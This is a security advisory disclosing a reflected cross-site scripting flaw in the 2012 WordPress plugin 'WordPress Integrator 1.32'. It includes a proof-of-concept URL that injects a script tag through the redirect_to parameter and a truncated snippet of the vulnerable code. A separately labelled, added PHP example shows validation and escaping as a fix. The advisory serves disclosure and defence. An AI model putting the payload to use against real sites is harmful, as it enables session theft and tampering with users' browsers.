SSCHADV2012-010 - WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability
Advisory: WordPress plugin ‘WordPress Integrator 1.32’ XSS vulnerability
Advisory ID: SSCHADV2012-010
Author: Stefan Schurtz
Affected Software: Successfully tested on WordPress Integrator 1.32
Vendor URL:
Vendor Status: informed
OSVDB ID: 80628
======================
Vulnerability Description
======================
The WordPress plugin ‘WordPress Integrator 1.32’ is prone to a cross-site scripting (XSS) vulnerability.
==============
PoC-Exploit
==============
http://[target]/wordpress/wp-login.php?redirect_to=http://%3F1<ScrIpT>alert(666)</ScrIpT>
// vulnerable code in wp-integrator.php
function init_handler() {
$url = parse_url($_SERVER["REQUEST_URI"]);
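
The advisory shows only the start of `init_handler()` and lists no fix. As an added example (not code from the plugin or from the advisory's author), the PHP below validates a reflected `redirect_to` value and escapes it before output, next to the unescaped pattern. The output sink, the function names, the fallback path and the host `blog.example` are assumptions.

```php
<?php
// Added example, not code from WordPress Integrator. Function names, the
// output sink and the host "blog.example" are hypothetical.

// Accept only local paths or http(s) URLs on the allowed host.
function safe_redirect_target(string $raw, string $allowedHost, string $fallback): string
{
    // Control characters, markup characters, quotes and backslashes never
    // belong in a redirect target, so reject them before parsing.
    if ($raw === '' || preg_match('/[\x00-\x1f<>"\'\\\\]/', $raw)) {
        return $fallback;
    }
    $parts = parse_url($raw);
    if ($parts === false) {
        return $fallback;
    }
    if (!isset($parts['scheme']) && !isset($parts['host'])) {
        // Relative reference: allow only an absolute path on this site.
        return $raw[0] === '/' ? $raw : $fallback;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    $host   = strtolower($parts['host'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true) || $host !== strtolower($allowedHost)) {
        return $fallback;
    }
    return $raw;
}

// Vulnerable pattern (assumed sink): the request value reaches HTML as-is.
function render_unsafe(string $redirectTo): string
{
    return '<input type="hidden" name="redirect_to" value="' . $redirectTo . '" />';
}

// Hardened: validate the target, then escape for the attribute context.
function render_safe(string $redirectTo): string
{
    $target = safe_redirect_target($redirectTo, 'blog.example', '/wp-admin/');
    return '<input type="hidden" name="redirect_to" value="'
        . htmlspecialchars($target, ENT_QUOTES, 'UTF-8') . '" />';
}

// Decoded redirect_to value from the advisory's PoC (%3F is "?"), followed by
// a constructed same-host URL that the validator accepts.
$poc = 'http://?1<ScrIpT>alert(666)</ScrIpT>';
echo render_unsafe($poc), "\n";
echo render_safe($poc), "\n";
echo render_safe('http://blog.example/wp-admin/?a=1&b=2'), "\n";
```

Validation and escaping are both applied on purpose: the allow-list stops off-site and script-scheme targets, while `htmlspecialchars()` keeps any accepted value from breaking out of the attribute.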
=====
Solution
=====
================
Disclosure Timeline
================
19-Mar-2012 – vendor informed
20-Mar-2012 – informed plugins@wordpress.org
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt